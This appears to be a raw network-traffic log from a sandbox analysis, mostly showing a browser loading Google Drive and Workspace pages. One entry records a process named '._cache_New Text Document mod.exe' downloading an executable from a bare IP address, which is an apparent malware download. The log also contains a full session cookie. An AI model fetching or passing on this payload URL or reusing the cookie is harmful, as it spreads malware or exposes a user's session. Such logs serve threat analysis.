accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
accept-language: en-US,en;q=0.5
accept-encoding: gzip, deflate, br
upgrade-insecure-requests: 1
sec-fetch-dest: document
sec-fetch-mode: navigate
sec-fetch-site: none
sec-fetch-user: ?1
te: trailers
DNS

accounts.google.com

firefox.exe

Remote address:

8.8.8.8:53

Request

accounts.google.com

IN A

Response

accounts.google.com

IN A

142.251.173.84
GET

https://accounts.google.com/ServiceLogin?service=wise&passive=1209600&osid=1&continue=https://drive.google.com/&followup=https://drive.google.com/&emr=1

firefox.exe

Remote address:

142.251.173.84:443

Request

GET /ServiceLogin?service=wise&passive=1209600&osid=1&continue=https://drive.google.com/&followup=https://drive.google.com/&emr=1 HTTP/2.0
host: accounts.google.com
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:124.0) Gecko/20100101 Firefox/124.0
accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
accept-language: en-US,en;q=0.5
accept-encoding: gzip, deflate, br
cookie: NID=520=e6kIEv2pe2kRrKi_jvS3S3p4l-WLZ3Yp43Qg2rKKJUx8L0JLtxRgHlIiwxAgBoduHNNFX8-Imgw3yHs-3Aj5N-6V1pzd-O5KpeGWDXV95ACkDElAYh42v_KlybT_qSZf58Qp-VATaY65gIlCznrWnTRagOA1nr14kdUJBvWj4-xs-8Hxw-awbNgSpQ
upgrade-insecure-requests: 1
sec-fetch-dest: document
sec-fetch-mode: navigate
sec-fetch-site: none
sec-fetch-user: ?1
te: trailers
DNS

accounts.google.com

firefox.exe

Remote address:

8.8.8.8:53

Request

accounts.google.com

IN AAAA

Response

accounts.google.com

IN AAAA

2a00:1450:400c:c1f::54
DNS

accounts.google.com

firefox.exe

Remote address:

8.8.8.8:53

Request

accounts.google.com

IN AAAA

Response

accounts.google.com

IN AAAA

2a00:1450:400c:c1f::54
DNS

www.google.com

firefox.exe

Remote address:

8.8.8.8:53

Request

www.google.com

IN A

Response

www.google.com

IN A

142.250.187.196
GET

https://www.google.com/intl/en-US/drive/

firefox.exe

Remote address:

142.250.187.196:443

Request

GET /intl/en-US/drive/ HTTP/2.0
host: www.google.com
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:124.0) Gecko/20100101 Firefox/124.0
accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
accept-language: en-US,en;q=0.5
accept-encoding: gzip, deflate, br
cookie: NID=520=e6kIEv2pe2kRrKi_jvS3S3p4l-WLZ3Yp43Qg2rKKJUx8L0JLtxRgHlIiwxAgBoduHNNFX8-Imgw3yHs-3Aj5N-6V1pzd-O5KpeGWDXV95ACkDElAYh42v_KlybT_qSZf58Qp-VATaY65gIlCznrWnTRagOA1nr14kdUJBvWj4-xs-8Hxw-awbNgSpQ
upgrade-insecure-requests: 1
sec-fetch-dest: document
sec-fetch-mode: navigate
sec-fetch-site: none
sec-fetch-user: ?1
te: trailers
DNS

www.google.com

firefox.exe

Remote address:

8.8.8.8:53

Request

www.google.com

IN AAAA

Response

www.google.com

IN AAAA

2a00:1450:4009:81f::2004
DNS

www.google.com

firefox.exe

Remote address:

8.8.8.8:53

Request

www.google.com

IN AAAA

Response

www.google.com

IN AAAA

2a00:1450:4009:81f::2004
DNS

workspace.google.com

firefox.exe

Remote address:

8.8.8.8:53

Request

workspace.google.com

IN A

Response

workspace.google.com

IN A

142.250.200.46
DNS

workspace.google.com

firefox.exe

Remote address:

8.8.8.8:53

Request

workspace.google.com

IN A

Response

workspace.google.com

IN A

142.250.200.46
GET

https://workspace.google.com/intl/en-US/products/drive/

firefox.exe

Remote address:

142.250.200.46:443

Request

GET /intl/en-US/products/drive/ HTTP/2.0
host: workspace.google.com
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:124.0) Gecko/20100101 Firefox/124.0
accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
accept-language: en-US,en;q=0.5
accept-encoding: gzip, deflate, br
cookie: NID=520=e6kIEv2pe2kRrKi_jvS3S3p4l-WLZ3Yp43Qg2rKKJUx8L0JLtxRgHlIiwxAgBoduHNNFX8-Imgw3yHs-3Aj5N-6V1pzd-O5KpeGWDXV95ACkDElAYh42v_KlybT_qSZf58Qp-VATaY65gIlCznrWnTRagOA1nr14kdUJBvWj4-xs-8Hxw-awbNgSpQ
upgrade-insecure-requests: 1
sec-fetch-dest: document
sec-fetch-mode: navigate
sec-fetch-site: none
sec-fetch-user: ?1
te: trailers
DNS

lh3.googleusercontent.com

firefox.exe

Remote address:

8.8.8.8:53

Request

lh3.googleusercontent.com

IN A

Response

lh3.googleusercontent.com

IN CNAME

googlehosted.l.googleusercontent.com

googlehosted.l.googleusercontent.com

IN A

142.250.200.33
GET

https://lh3.googleusercontent.com/RzrCOW3W04EKFPlpQeagbcX-3FrUDfpa7qKhYBVJq0KQxjfBwoRBHGJpTWM2FAQgqioEmE5OxwLslpmuHpN-zD2mqY_AWKj95bsE

firefox.exe

Remote address:

142.250.200.33:443

Request

GET /RzrCOW3W04EKFPlpQeagbcX-3FrUDfpa7qKhYBVJq0KQxjfBwoRBHGJpTWM2FAQgqioEmE5OxwLslpmuHpN-zD2mqY_AWKj95bsE HTTP/2.0
host: lh3.googleusercontent.com
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:124.0) Gecko/20100101 Firefox/124.0
accept: image/avif,image/webp,*/*
accept-language: en-US,en;q=0.5
accept-encoding: gzip, deflate, br
referer: https://workspace.google.com/
sec-fetch-dest: image
sec-fetch-mode: no-cors
sec-fetch-site: cross-site
te: trailers
GET

https://lh3.googleusercontent.com/dvAfIQb0KajN6WUONfemiYUwCwrzoN7qAUsioJt2DyV1dt3LNLUmxHHvCXFHI6ZEFxjx_ClxenFxr587O36XX8a5QeUMEAS-1WJe

firefox.exe

Remote address:

142.250.200.33:443

Request

GET /dvAfIQb0KajN6WUONfemiYUwCwrzoN7qAUsioJt2DyV1dt3LNLUmxHHvCXFHI6ZEFxjx_ClxenFxr587O36XX8a5QeUMEAS-1WJe HTTP/2.0
host: lh3.googleusercontent.com
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:124.0) Gecko/20100101 Firefox/124.0
accept: image/avif,image/webp,*/*
accept-language: en-US,en;q=0.5
accept-encoding: gzip, deflate, br
referer: https://workspace.google.com/
sec-fetch-dest: image
sec-fetch-mode: no-cors
sec-fetch-site: cross-site
te: trailers
GET

https://lh3.googleusercontent.com/qSRx0MPsSqwsxnB7oa8jkMwSmA03iQcMjrmJOnmNkA4o_mA2a9Q1II6moeBU7r1ztzOXQpLnKuMhIeFPmiP46hOw728K4Aw3JY4=e365-pa-nu-rw-w1455

firefox.exe

Remote address:

142.250.200.33:443

Request

GET /qSRx0MPsSqwsxnB7oa8jkMwSmA03iQcMjrmJOnmNkA4o_mA2a9Q1II6moeBU7r1ztzOXQpLnKuMhIeFPmiP46hOw728K4Aw3JY4=e365-pa-nu-rw-w1455 HTTP/2.0
host: lh3.googleusercontent.com
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:124.0) Gecko/20100101 Firefox/124.0
accept: image/avif,image/webp,*/*
accept-language: en-US,en;q=0.5
accept-encoding: gzip, deflate, br
referer: https://workspace.google.com/
sec-fetch-dest: image
sec-fetch-mode: no-cors
sec-fetch-site: cross-site
te: trailers
GET

https://lh3.googleusercontent.com/mFX4RtYSpBwXZXB71FNeXM6v9iEcAsCYoEWvaA0SJB_EfOi2TvXNJ455zRiaCZb-_IiTsbEDlOWQi1Y2as2t_9rzUQe6zkldGInt

firefox.exe

Remote address:

142.250.200.33:443

Request

GET /mFX4RtYSpBwXZXB71FNeXM6v9iEcAsCYoEWvaA0SJB_EfOi2TvXNJ455zRiaCZb-_IiTsbEDlOWQi1Y2as2t_9rzUQe6zkldGInt HTTP/2.0
host: lh3.googleusercontent.com
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:124.0) Gecko/20100101 Firefox/124.0
accept: image/avif,image/webp,*/*
accept-language: en-US,en;q=0.5
accept-encoding: gzip, deflate, br
referer: https://workspace.google.com/
sec-fetch-dest: image
sec-fetch-mode: no-cors
sec-fetch-site: cross-site
te: trailers
GET

https://lh3.googleusercontent.com/5PYAwhP5cuGQEIi-R8V-keA4jaJZG82g8iBrKCoPKXHCP2nyyO6i6kzAH0i8MA8AVwgOAlxzcai7yKHVzVmUeHMd_FkVeQIG41s=e365-pa-nu-s0-v0-rw

firefox.exe

Remote address:

142.250.200.33:443

Request

GET /5PYAwhP5cuGQEIi-R8V-keA4jaJZG82g8iBrKCoPKXHCP2nyyO6i6kzAH0i8MA8AVwgOAlxzcai7yKHVzVmUeHMd_FkVeQIG41s=e365-pa-nu-s0-v0-rw HTTP/2.0
host: lh3.googleusercontent.com
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:124.0) Gecko/20100101 Firefox/124.0
accept: image/avif,image/webp,*/*
accept-language: en-US,en;q=0.5
accept-encoding: gzip, deflate, br
referer: https://workspace.google.com/
sec-fetch-dest: image
sec-fetch-mode: no-cors
sec-fetch-site: cross-site
te: trailers
GET

https://lh3.googleusercontent.com/7J-_LaRuKfDqWTv_xGtUao2gtOI7GUrr4cNcy_8cHtXpOMLFt3-VdllzAPEVC--KGilwE7pOCUI3KBRWsa_V7TCHXM0Eiqgy1H9m=e365-pa-nu-s0-v0-rw

firefox.exe

Remote address:

142.250.200.33:443

Request

GET /7J-_LaRuKfDqWTv_xGtUao2gtOI7GUrr4cNcy_8cHtXpOMLFt3-VdllzAPEVC--KGilwE7pOCUI3KBRWsa_V7TCHXM0Eiqgy1H9m=e365-pa-nu-s0-v0-rw HTTP/2.0
host: lh3.googleusercontent.com
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:124.0) Gecko/20100101 Firefox/124.0
accept: image/avif,image/webp,*/*
accept-language: en-US,en;q=0.5
accept-encoding: gzip, deflate, br
referer: https://workspace.google.com/
sec-fetch-dest: image
sec-fetch-mode: no-cors
sec-fetch-site: cross-site
te: trailers
GET

https://lh3.googleusercontent.com/S26WkdqBRQZW8PC_mo5mE45tepl9xY74x1-esi0Upaey-XV0sbs4Fvt7Uq3sP5LARkSbsOwTTIjKUiXTbVtArtuP4Fg-a7v4cAVN=e365-pa-nu-s0-v0-rw

firefox.exe

Remote address:

142.250.200.33:443

Request

GET /S26WkdqBRQZW8PC_mo5mE45tepl9xY74x1-esi0Upaey-XV0sbs4Fvt7Uq3sP5LARkSbsOwTTIjKUiXTbVtArtuP4Fg-a7v4cAVN=e365-pa-nu-s0-v0-rw HTTP/2.0
host: lh3.googleusercontent.com
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:124.0) Gecko/20100101 Firefox/124.0
accept: image/avif,image/webp,*/*
accept-language: en-US,en;q=0.5
accept-encoding: gzip, deflate, br
referer: https://workspace.google.com/
sec-fetch-dest: image
sec-fetch-mode: no-cors
sec-fetch-site: cross-site
te: trailers
GET

https://lh3.googleusercontent.com/7J-_LaRuKfDqWTv_xGtUao2gtOI7GUrr4cNcy_8cHtXpOMLFt3-VdllzAPEVC--KGilwE7pOCUI3KBRWsa_V7TCHXM0Eiqgy1H9m=e365-pa-nu-s0-rw

firefox.exe

Remote address:

142.250.200.33:443

Request

GET /7J-_LaRuKfDqWTv_xGtUao2gtOI7GUrr4cNcy_8cHtXpOMLFt3-VdllzAPEVC--KGilwE7pOCUI3KBRWsa_V7TCHXM0Eiqgy1H9m=e365-pa-nu-s0-rw HTTP/2.0
host: lh3.googleusercontent.com
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:124.0) Gecko/20100101 Firefox/124.0
accept: image/avif,image/webp,*/*
accept-language: en-US,en;q=0.5
accept-encoding: gzip, deflate, br
referer: https://workspace.google.com/
sec-fetch-dest: image
sec-fetch-mode: no-cors
sec-fetch-site: cross-site
te: trailers
GET

https://lh3.googleusercontent.com/S26WkdqBRQZW8PC_mo5mE45tepl9xY74x1-esi0Upaey-XV0sbs4Fvt7Uq3sP5LARkSbsOwTTIjKUiXTbVtArtuP4Fg-a7v4cAVN=e365-pa-nu-s0-rw

firefox.exe

Remote address:

142.250.200.33:443

Request

GET /S26WkdqBRQZW8PC_mo5mE45tepl9xY74x1-esi0Upaey-XV0sbs4Fvt7Uq3sP5LARkSbsOwTTIjKUiXTbVtArtuP4Fg-a7v4cAVN=e365-pa-nu-s0-rw HTTP/2.0
host: lh3.googleusercontent.com
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:124.0) Gecko/20100101 Firefox/124.0
accept: image/avif,image/webp,*/*
accept-language: en-US,en;q=0.5
accept-encoding: gzip, deflate, br
referer: https://workspace.google.com/
sec-fetch-dest: image
sec-fetch-mode: no-cors
sec-fetch-site: cross-site
te: trailers
GET

https://lh3.googleusercontent.com/5PYAwhP5cuGQEIi-R8V-keA4jaJZG82g8iBrKCoPKXHCP2nyyO6i6kzAH0i8MA8AVwgOAlxzcai7yKHVzVmUeHMd_FkVeQIG41s=e365-pa-nu-s0-rw

firefox.exe

Remote address:

142.250.200.33:443

Request

GET /5PYAwhP5cuGQEIi-R8V-keA4jaJZG82g8iBrKCoPKXHCP2nyyO6i6kzAH0i8MA8AVwgOAlxzcai7yKHVzVmUeHMd_FkVeQIG41s=e365-pa-nu-s0-rw HTTP/2.0
host: lh3.googleusercontent.com
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:124.0) Gecko/20100101 Firefox/124.0
accept: image/avif,image/webp,*/*
accept-language: en-US,en;q=0.5
accept-encoding: gzip, deflate, br
referer: https://workspace.google.com/
sec-fetch-dest: image
sec-fetch-mode: no-cors
sec-fetch-site: cross-site
te: trailers
GET

https://lh3.googleusercontent.com/qi-5khAOg8HlqE6BVJSyGuReX7cLrXx-tg_UlrLsP0sTvuIvMe2IdCenW9jL-KTjxkVf9f0ONBMOTBPE84bp-cl6PPEKhNgRzTQ=e365-pa-nu-s0-rw

firefox.exe

Remote address:

142.250.200.33:443

Request

GET /qi-5khAOg8HlqE6BVJSyGuReX7cLrXx-tg_UlrLsP0sTvuIvMe2IdCenW9jL-KTjxkVf9f0ONBMOTBPE84bp-cl6PPEKhNgRzTQ=e365-pa-nu-s0-rw HTTP/2.0
host: lh3.googleusercontent.com
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:124.0) Gecko/20100101 Firefox/124.0
accept: image/avif,image/webp,*/*
accept-language: en-US,en;q=0.5
accept-encoding: gzip, deflate, br
referer: https://workspace.google.com/
sec-fetch-dest: image
sec-fetch-mode: no-cors
sec-fetch-site: cross-site
te: trailers
GET

https://lh3.googleusercontent.com/luR__x3sJf7BA833oja0gDViwRv_hnYZKBEcQOo9iBu3eKttHYmktkaCRjE4ECxmzFSQTIxMoCyhRY6WwXPJvw564LfY457Eig=e365-pa-nu-s0-rw

firefox.exe

Remote address:

142.250.200.33:443

Request

GET /luR__x3sJf7BA833oja0gDViwRv_hnYZKBEcQOo9iBu3eKttHYmktkaCRjE4ECxmzFSQTIxMoCyhRY6WwXPJvw564LfY457Eig=e365-pa-nu-s0-rw HTTP/2.0
host: lh3.googleusercontent.com
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:124.0) Gecko/20100101 Firefox/124.0
accept: image/avif,image/webp,*/*
accept-language: en-US,en;q=0.5
accept-encoding: gzip, deflate, br
referer: https://workspace.google.com/
sec-fetch-dest: image
sec-fetch-mode: no-cors
sec-fetch-site: cross-site
te: trailers
GET

https://lh3.googleusercontent.com/SB__9Ik-UqlTHS9Mp0zO-QVdPPVxb3o1Ek17Z3y1Q7_rUGN0j8s-xA0rqdAXM0Mb1z3VJ8v-rDzHfDX-yLGfMxgbaKGAGHPmQZis=e365-pa-nu-s0-rw

firefox.exe

Remote address:

142.250.200.33:443

Request

GET /SB__9Ik-UqlTHS9Mp0zO-QVdPPVxb3o1Ek17Z3y1Q7_rUGN0j8s-xA0rqdAXM0Mb1z3VJ8v-rDzHfDX-yLGfMxgbaKGAGHPmQZis=e365-pa-nu-s0-rw HTTP/2.0
host: lh3.googleusercontent.com
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:124.0) Gecko/20100101 Firefox/124.0
accept: image/avif,image/webp,*/*
accept-language: en-US,en;q=0.5
accept-encoding: gzip, deflate, br
referer: https://workspace.google.com/
sec-fetch-dest: image
sec-fetch-mode: no-cors
sec-fetch-site: cross-site
te: trailers
GET

https://lh3.googleusercontent.com/kb_Qu0wccTbbxMVmy7WnBOrPO8taACz0oi32xRNPuBBZe4uz50DwiYufFP7S3E230TGQSEu3Nu021PDcIADDimr7HrenNYCVv_EY=e365-pa-nu-s0-rw

firefox.exe

Remote address:

142.250.200.33:443

Request

GET /kb_Qu0wccTbbxMVmy7WnBOrPO8taACz0oi32xRNPuBBZe4uz50DwiYufFP7S3E230TGQSEu3Nu021PDcIADDimr7HrenNYCVv_EY=e365-pa-nu-s0-rw HTTP/2.0
host: lh3.googleusercontent.com
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:124.0) Gecko/20100101 Firefox/124.0
accept: image/avif,image/webp,*/*
accept-language: en-US,en;q=0.5
accept-encoding: gzip, deflate, br
referer: https://workspace.google.com/
sec-fetch-dest: image
sec-fetch-mode: no-cors
sec-fetch-site: cross-site
te: trailers
GET

https://lh3.googleusercontent.com/wePSigsq8uFv9S_k42piWs8mGFKr97FSAonu0EnxiiEim4g4n6KIGiu9o0OgbP8zq6GeJQW60MEDzWAWb5ahu9Sa0ZYUnh1fO8E=e365-pa-nu-s0-rw

firefox.exe

Remote address:

142.250.200.33:443

Request

GET /wePSigsq8uFv9S_k42piWs8mGFKr97FSAonu0EnxiiEim4g4n6KIGiu9o0OgbP8zq6GeJQW60MEDzWAWb5ahu9Sa0ZYUnh1fO8E=e365-pa-nu-s0-rw HTTP/2.0
host: lh3.googleusercontent.com
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:124.0) Gecko/20100101 Firefox/124.0
accept: image/avif,image/webp,*/*
accept-language: en-US,en;q=0.5
accept-encoding: gzip, deflate, br
referer: https://workspace.google.com/
sec-fetch-dest: image
sec-fetch-mode: no-cors
sec-fetch-site: cross-site
te: trailers
GET

https://lh3.googleusercontent.com/I-x3e5aXGAe8z9azwZi2W1Axx1xsibQBx8TRVHhbFhRucNWn-6PngJ1BoXci_06bcmvUaVc_HLTvPsv6NiqKJq4QyuYbYfm9bj9iZA=e365-pa-nu-s0-rw

firefox.exe

Remote address:

142.250.200.33:443

Request

GET /I-x3e5aXGAe8z9azwZi2W1Axx1xsibQBx8TRVHhbFhRucNWn-6PngJ1BoXci_06bcmvUaVc_HLTvPsv6NiqKJq4QyuYbYfm9bj9iZA=e365-pa-nu-s0-rw HTTP/2.0
host: lh3.googleusercontent.com
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:124.0) Gecko/20100101 Firefox/124.0
accept: image/avif,image/webp,*/*
accept-language: en-US,en;q=0.5
accept-encoding: gzip, deflate, br
referer: https://workspace.google.com/
sec-fetch-dest: image
sec-fetch-mode: no-cors
sec-fetch-site: cross-site
te: trailers
GET

https://lh3.googleusercontent.com/5xw2Y5jI0iz24qieD7U1ETqd1dwUZvtmZuJiGkKSQj-yEFaEVmLw6XgKXzOLon_RiX-5t3amygvXebgNN8bgyxQlO_3vhAgwpyMc=e365-pa-nu-s0-rw

firefox.exe

Remote address:

142.250.200.33:443

Request

GET /5xw2Y5jI0iz24qieD7U1ETqd1dwUZvtmZuJiGkKSQj-yEFaEVmLw6XgKXzOLon_RiX-5t3amygvXebgNN8bgyxQlO_3vhAgwpyMc=e365-pa-nu-s0-rw HTTP/2.0
host: lh3.googleusercontent.com
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:124.0) Gecko/20100101 Firefox/124.0
accept: image/avif,image/webp,*/*
accept-language: en-US,en;q=0.5
accept-encoding: gzip, deflate, br
referer: https://workspace.google.com/
sec-fetch-dest: image
sec-fetch-mode: no-cors
sec-fetch-site: cross-site
te: trailers
GET

https://lh3.googleusercontent.com/gXQ1CySD9oW9wM2niB5c0fnbttInuG7qtUzp7oQzry-ok6hg3lMuk6z0yKJTgUd2qBGs3xJwZF64iflmj8xP8SUwOvNbLPHGICjT=e365-pa-nu-s0-rw

firefox.exe

Remote address:

142.250.200.33:443

Request

GET /gXQ1CySD9oW9wM2niB5c0fnbttInuG7qtUzp7oQzry-ok6hg3lMuk6z0yKJTgUd2qBGs3xJwZF64iflmj8xP8SUwOvNbLPHGICjT=e365-pa-nu-s0-rw HTTP/2.0
host: lh3.googleusercontent.com
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:124.0) Gecko/20100101 Firefox/124.0
accept: image/avif,image/webp,*/*
accept-language: en-US,en;q=0.5
accept-encoding: gzip, deflate, br
referer: https://workspace.google.com/
sec-fetch-dest: image
sec-fetch-mode: no-cors
sec-fetch-site: cross-site
te: trailers
DNS

googlehosted.l.googleusercontent.com

firefox.exe

Remote address:

8.8.8.8:53

Request

googlehosted.l.googleusercontent.com

IN A

Response

googlehosted.l.googleusercontent.com

IN A

142.250.200.33
DNS

googlehosted.l.googleusercontent.com

firefox.exe

Remote address:

8.8.8.8:53

Request

googlehosted.l.googleusercontent.com

IN AAAA

Response

googlehosted.l.googleusercontent.com

IN AAAA

2a00:1450:4009:823::2001
DNS

googlehosted.l.googleusercontent.com

firefox.exe

Remote address:

8.8.8.8:53

Request

googlehosted.l.googleusercontent.com

IN AAAA

Response

googlehosted.l.googleusercontent.com

IN AAAA

2a00:1450:4009:823::2001
GET

http://66.63.187.250/zmk/gem2.exe

._cache_New Text Document mod.exe

Remote address:

66.63.187.250:80

Request

GET /zmk/gem2.exe HTTP/1.1
Host: 66.63.187.250
Connection: Keep-Alive

Response

HTTP/1.1 200 OK

Date: Mon, 13 Jan 2025 17:40:46 GMT
Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
Last-Modified: Thu, 09 Jan 2025 17:31:21 GMT
ETag: "2be400-62b4958b77c51"
Accept-Ranges: bytes
Content-Length: 2876416
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: application/x-msdownload
DNS

storage.googleapis.com

firefox.exe

Remote address:

8.8.8.8:53

Request

storage.googleapis.com

IN A

Response

storage.googleapis.com

IN A

172.217.16.251

storage.googleapis.com

IN A

142.250.200.59

storage.googleapis.com

IN A

216.58.201.123

storage.googleapis.com

IN A

216.58.204.91

storage.googleapis.com

IN A

142.250.179.251

storage.googleapis.com

IN A

142.250.200.27

storage.googleapis.com

IN A

216.58.212.251

storage.googleapis.com

IN A

142.250.178.27

storage.googleapis.com

IN A

216.58.213.27

storage.googleapis.com

IN A

142.250.180.27

storage.googleapis.com

IN A

216.58.212.219

storage.googleapis.com

IN A

172.217.169.91

storage.googleapis.com

IN A

142.250.187.251

storage.googleapis.com

IN A

142.250.187.219
DNS

storage.googleapis.com

firefox.exe

Remote address:

8.8.8.8:53

Request

storage.googleapis.com

IN A

Response

storage.googleapis.com

IN A

216.58.204.91

storage.googleapis.com

IN A

216.58.212.251

storage.googleapis.com

IN A

172.217.16.251

storage.googleapis.com

IN A

216.58.201.123

storage.googleapis.com

IN A

142.250.179.251

storage.googleapis.com

IN A

216.58.213.27

storage.googleapis.com

IN A

172.217.169.91

storage.googleapis.com

IN A

142.250.180.27

storage.googleapis.com

IN A

142.250.187.219

storage.googleapis.com

IN A

142.250.200.59

storage.googleapis.com

IN A

142.250.178.27

storage.googleapis.com

IN A

216.58.212.219

storage.googleapis.com

IN A

142.250.187.251

storage.googleapis.com

IN A

142.250.200.27
DNS

ssl.google-analytics.com

firefox.exe

Remote address:

8.8.8.8:53

Request

ssl.google-analytics.com

IN A

Response

ssl.google-analytics.com

IN A

142.250.178.8
DNS

ssl.google-analytics.com

firefox.exe

Remote address:

8.8.8.8:53

Request

ssl.google-analytics.com

IN A

Response

ssl.google-analytics.com

IN A

142.250.187.200
DNS

storage.googleapis.com

firefox.exe

Remote address:

8.8.8.8:53

Request

storage.googleapis.com

IN AAAA

Response

storage.googleapis.com

IN AAAA

2a00:1450:4009:81f::201b

storage.googleapis.com

IN AAAA

2a00:1450:4009:81d::201b

storage.googleapis.com

IN AAAA

2a00:1450:4009:819::201b

storage.googleapis.com

IN AAAA

2a00:1450:4009:81e::201b
DNS

storage.googleapis.com

firefox.exe

Remote address:

8.8.8.8:53

Request

storage.googleapis.com

IN AAAA

Response

storage.googleapis.com

IN AAAA

2a00:1450:4009:819::201b

storage.googleapis.com

IN AAAA

2a00:1450:4009:81f::201b

storage.googleapis.com

IN AAAA

2a00:1450:4009:81d::201b

storage.googleapis.com

IN AAAA

2a00:1450:4009:81e::201b
GET

https://storage.googleapis.com/assets_workspace/uploads/7uffzv9dk4sn-3652TCzauH9jaL0QJ8H6FM-bfed64c7e8da9ac20d439f436570f955-Drive_Full_Logo_2x.svg

firefox.exe

Remote address:

172.217.16.251:443

Request

GET /assets_workspace/uploads/7uffzv9dk4sn-3652TCzauH9jaL0QJ8H6FM-bfed64c7e8da9ac20d439f436570f955-Drive_Full_Logo_2x.svg HTTP/2.0
host: storage.googleapis.com
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:124.0) Gecko/20100101 Firefox/124.0
accept: image/avif,image/webp,*/*
accept-language: en-US,en;q=0.5
accept-encoding: gzip, deflate, br
referer: https://workspace.google.com/
sec-fetch-dest: image
sec-fetch-mode: no-cors
sec-fetch-site: cross-site
te: trailers
GET

https://storage.googleapis.com/assets_workspace/uploads/7uffzv9dk4sn-7LhoZoRSU32Sn20yI8213k-92d83d07ba564bddac887d329c3589c2-Vector.svg

firefox.exe

Remote address:

172.217.16.251:443

Request

GET /assets_workspace/uploads/7uffzv9dk4sn-7LhoZoRSU32Sn20yI8213k-92d83d07ba564bddac887d329c3589c2-Vector.svg HTTP/2.0
host: storage.googleapis.com
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:124.0) Gecko/20100101 Firefox/124.0
accept: image/avif,image/webp,*/*
accept-language: en-US,en;q=0.5
accept-encoding: gzip, deflate, br
referer: https://workspace.google.com/
sec-fetch-dest: image
sec-fetch-mode: no-cors
sec-fetch-site: cross-site
te: trailers
GET

https://ssl.google-analytics.com/ga.js

firefox.exe

Remote address:

142.250.178.8:443

Request

GET /ga.js HTTP/2.0
host: ssl.google-analytics.com
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:124.0) Gecko/20100101 Firefox/124.0
accept: */*
accept-language: en-US,en;q=0.5
accept-encoding: gzip, deflate, br
referer: https://workspace.google.com/
sec-fetch-dest: script
sec-fetch-mode: no-cors
sec-fetch-site: cross-site
te: trailers
DNS

ssl.google-analytics.com

firefox.exe

Remote address:

8.8.8.8:53

Request

ssl.google-analytics.com

IN AAAA

Response

ssl.google-analytics.com

IN AAAA

2a00:1450:4009:80a::2008
DNS

ssl.google-analytics.com

firefox.exe

Remote address:

8.8.8.8:53

Request

ssl.google-analytics.com

IN AAAA

Response

ssl.google-analytics.com

IN AAAA

2a00:1450:4009:80a::2008
DNS

250.187.63.66.in-addr.arpa

Dnscache

Remote address:

8.8.8.8:53

Request

250.187.63.66.in-addr.arpa

IN PTR

Response
DNS

250.187.63.66.in-addr.arpa

Dnscache

Remote address:

8.8.8.8:53

Request

250.187.63.66.in-addr.arpa

IN PTR

Response
DNS

251.16.217.172.in-addr.arpa

Dnscache

Remote address:

8.8.8.8:53

Request

251.16.217.172.in-addr.arpa

IN PTR

Response

251.16.217.172.in-addr.arpa

IN PTR

mad08s04-in-f271e100net

251.16.217.172.in-addr.arpa

IN PTR

lhr48s28-in-f27�I
DNS

8.178.250.142.in-addr.arpa

Dnscache

Remote address:

8.8.8.8:53

Request

8.178.250.142.in-addr.arpa

IN PTR

Response

8.178.250.142.in-addr.arpa

IN PTR

lhr48s27-in-f81e100net
DNS

region1.google-analytics.com

firefox.exe

Remote address:

8.8.8.8:53

Request

region1.google-analytics.com

IN A

Response

region1.google-analytics.com

IN A

216.239.34.36

region1.google-analytics.com

IN A

216.239.32.36
DNS

stats.g.doubleclick.net

firefox.exe

Remote address:

8.8.8.8:53

Request

stats.g.doubleclick.net

IN A

Response

stats.g.doubleclick.net

IN A

64.233.184.156

stats.g.doubleclick.net

IN A

64.233.184.155

stats.g.doubleclick.net

IN A

64.233.184.157

stats.g.doubleclick.net

IN A

64.233.184.154
DNS

drivefrontend-pa.clients6.google.com

firefox.exe

Remote address:

8.8.8.8:53

Request

drivefrontend-pa.clients6.google.com

IN A

Response

drivefrontend-pa.clients6.google.com

IN A

216.58.204.74
DNS

drivefrontend-pa.clients6.google.com

firefox.exe

Remote address:

8.8.8.8:53

Request

drivefrontend-pa.clients6.google.com

IN A

Response

drivefrontend-pa.clients6.google.com

IN A

216.58.212.234
POST

https://stats.g.doubleclick.net/j/collect?t=dc&aip=1&_r=3&v=1&_v=j101&tid=UA-18073-34&cid=230335749.1736790046&jid=1866785601&gjid=1277687835&_gid=146379914.1736790046&_u=YCDAiEABDAAAAGgBI~&z=991859826

firefox.exe

Remote address:

64.233.184.156:443

Request

POST /j/collect?t=dc&aip=1&_r=3&v=1&_v=j101&tid=UA-18073-34&cid=230335749.1736790046&jid=1866785601&gjid=1277687835&_gid=146379914.1736790046&_u=YCDAiEABDAAAAGgBI~&z=991859826 HTTP/2.0
host: stats.g.doubleclick.net
